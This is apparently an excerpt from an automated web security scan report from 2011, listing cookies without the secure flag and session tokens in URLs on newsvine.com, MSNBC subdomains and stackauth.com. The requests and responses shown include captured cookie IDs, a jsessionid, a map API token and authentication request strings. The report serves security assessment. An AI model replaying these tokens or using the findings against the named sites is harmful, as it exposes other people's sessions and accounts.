The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:58:45 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=f8216a56010cce7056bb2bebc2b8ea2f; expires=Sat, 25-Jan-2031 01:58:45 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 10103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...

10.22. https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/msnbc/emailAlerts

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/msnbc/emailAlerts HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:14:53 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=0e0c419af9db7beaa9782211b1d63042; expires=Sat, 25-Jan-2031 03:14:53 GMT; path=/; domain=.newsvine.com
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close


10.23. https://www.newsvine.com/_nv/accounts/msnbc/newsletters

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/msnbc/newsletters

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/msnbc/newsletters HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:23:00 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=612c76b17edbcde9ea20fe784e8a625d; expires=Sat, 25-Jan-2031 01:23:00 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41168


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-
...[SNIP]...

10.24. https://www.newsvine.com/_nv/accounts/register

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/register

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/register HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:53 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=209e83103b98465a328a2c9ac4b644ca; expires=Sat, 25-Jan-2031 01:22:53 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 11769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...

10.25. https://www.newsvine.com/_nv/api/accounts/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/api/accounts/login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/api/accounts/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:51 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=aa6836e6849505e061ea2e467e70f836; expires=Sat, 25-Jan-2031 01:22:51 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=60
Expires: Sun, 30 Jan 2011 01:23:51 GMT
Vary: Accept-Encoding
Content-Length: 97
Content-Type: application/json
Connection: close

{"data":{"errors":{"L2":"Please enter your email address and password."}},"statusCode":"failure"}

10.26. https://www.newsvine.com/_nv/api/accounts/resetPassword

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/api/accounts/resetPassword

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/api/accounts/resetPassword HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:14:02 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=b87462d701086cc5258ca445f8422d6b; expires=Sat, 25-Jan-2031 03:14:02 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=60
Expires: Sun, 30 Jan 2011 03:15:02 GMT
Vary: Accept-Encoding
Content-Length: 100
Content-Type: application/json
Connection: close

{"data":{"errors":{"RP1":"Please enter your email address or domain name."}},"statusCode":"failure"}

11. Session token in URL
There are 21 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


11.1. http://clk.redcated/go/286026710/direct

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://clk.redcated
Path:   /go/286026710/direct

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /go/286026710/direct;vt.1;ai.195291342;ct.$num$/01/&ArmClickToken=$num$ver=1&clickTag1=!~!click!~!http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.1/01&clickTag2=!~!click!~!http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.2/01&clickTag3=!~!click!~!http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.3/01&clickTag4=!~!click!~!http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.4/01&clickTag5=!~!click!~!http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.5/01&clickTag6=!~!click!~!http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.6/01 HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://us.ishares.com/home.htm?cmp=keepevolving&chn=BA&c=MSN
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353223-3933257; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=0A4C5DE803D0423D892C3F0C8538F026; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1c5b3; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=ba3e8ce/1c5b3/110c6bd6/bab9/4d44c7c7; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:07:03 GMT
Connection: close


11.2. http://cosmiclog.msnbc.redacted/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://cosmiclog.msnbc.redacted
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: cosmiclog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:07:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 145284

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Cosmic Log</title>
<meta
...[SNIP]...
<p>Bomb-sniffing plants could make airport security a whole lot greener &ndash; at least until a bomb-packing terrorist walks by and causes the leaves to turn white, <a target="_blank" href="http://www.plosone.org/article/info%3Adoi%2F10.1371%2Fjournal.pone.0016292;jsessionid=9E6895D8F62E08DA00CA29E1E6705A22.ambra02">researchers report in the journal PLoS ONE</a>
...[SNIP]...

11.3. http://local.redacted/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://local.redacted
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:29 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA29
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=8349c3df213b40858bffbf1ed5e320d4; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=AEB046B1DD804980BD22C1D7DC865D48; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 45759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX+boa&amp;cat=270&amp;FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&amp;w=124&amp;h=124&amp;o=jpeg&amp;b=r,shading.hill,mkt.en-US&amp;z=8&amp;token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...

11.4. http://local.redacted/gas-traffic.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://local.redacted
Path:   /gas-traffic.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /gas-traffic.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:09:28 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA27
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=5b47497cc43743d9be4c3d0002efa31f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=72D4472BCF114A3497BE87B9061DAD51; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:28 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 44553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&amp;FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&amp;w=124&amp;h=124&amp;o=jpeg&amp;b=r,shading.hill,mkt.en-US&amp;z=8&amp;token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<a href="http://www.bing.com/maps/default.aspx?trfc=1&amp;where1=Dallas,TX&amp;FORM=MSNLEC&amp;encType=1"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&amp;w=458&amp;h=300&amp;o=jpeg&amp;b=r,shading.hill,mkt.en-US&amp;z=10&amp;t=f&amp;token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" alt="local traffic map" height="300" width="458" /></a>
...[SNIP]...

11.5. http://local.redacted/hourly.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://local.redacted
Path:   /hourly.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /hourly.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:52 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA25
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=fe9b558f11c048c5b0bcfead5c27909c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=D700EC8FE6A84E6E86AF10C957726EEB; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:52 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 52446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&amp;FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&amp;w=124&amp;h=124&amp;o=jpeg&amp;b=r,shading.hill,mkt.en-US&amp;z=8&amp;token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...

11.6. http://local.redacted/movies-events.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://local.redacted
Path:   /movies-events.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /movies-events.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:43 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA28
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=362ea74ed69b4e3e91979daf6227ebc5; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=54E9E8A3E60641D9AC7FE4403046D572; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:43 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 59606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&amp;FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&amp;w=124&amp;h=124&amp;o=jpeg&amp;b=r,shading.hill,mkt.en-US&amp;z=8&amp;token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...

11.7. http://local.redacted/news.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://local.redacted
Path:   /news.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /news.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:29 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA32
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3953a7e65afb42b0ade3749d752dcf1c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=C14043A1E67E44BCAA9A3B68AA8AFD89; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 45752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&amp;FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&amp;w=124&amp;h=124&amp;o=jpeg&amp;b=r,shading.hill,mkt.en-US&amp;z=8&amp;token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...

11.8. http://local.redacted/restaurants.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://local.redacted
Path:   /restaurants.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /restaurants.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:45 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA31
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=11c3bf43b93e4ed9af237f65b02844d7; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=47142BBDAAA74E00893F20DA82ED8C2E; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:45 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 49227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&amp;FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&amp;w=124&amp;h=124&amp;o=jpeg&amp;b=r,shading.hill,mkt.en-US&amp;z=8&amp;token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...

11.9. http://local.redacted/sports.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://local.redacted
Path:   /sports.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /sports.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:41 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA27
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=d11d2c165e674866abd16c8b8cb9e1bb; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=A7A43B87D4E04DEA9AC850EC95E92AE2; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:41 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 94929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&amp;FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&amp;w=124&amp;h=124&amp;o=jpeg&amp;b=r,shading.hill,mkt.en-US&amp;z=8&amp;token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...

11.10. http://local.redacted/ten-day.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://local.redacted
Path:   /ten-day.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /ten-day.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:49 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA29
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=b091c91e5f57464f867c86a6838b0181; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=5D4B178CF6734098BD0B688BB765F218; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:49 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 49042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&amp;FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&amp;w=124&amp;h=124&amp;o=jpeg&amp;b=r,shading.hill,mkt.en-US&amp;z=8&amp;token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...

11.11. http://local.redacted/weather.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://local.redacted
Path:   /weather.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /weather.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:33 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA30
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=fd5b4d05da194df0bdd44cf8adbd21ef; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=2B70DCC8FEC94F45B962D0715AF96955; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:33 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 48963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&amp;FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&amp;w=124&amp;h=124&amp;o=jpeg&amp;b=r,shading.hill,mkt.en-US&amp;z=8&amp;token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...

11.12. http://stackauth.com/auth/global/read

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://stackauth.com
Path:   /auth/global/read

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /auth/global/read?request=lNFEJmiMWRvnZEvOWYpUnSipo9yf2IIGqtPflTj16ER0fdpDutY%2BTxasmc8BrnyYDeYjNVIsJs2AVBeBqTJirA%3D%3D&nonce=on9FTQAAAACIr5drBee4yA%3D%3D HTTP/1.1
Host: stackauth.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:11:31 GMT
Content-Length: 1199

<html><head>
<script type='text/javascript'>
var data = {"ReadSession":"http://stackauth.com/auth/global/read-session","Request":"lNFEJmiMWRvnZEvOWYpUnSipo9yf2IIG
...[SNIP]...

11.13. http://thelastword.msnbc.redacted/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://thelastword.msnbc.redacted
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: thelastword.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:55:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 67375

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>The Last Word</title>
<me
...[SNIP]...
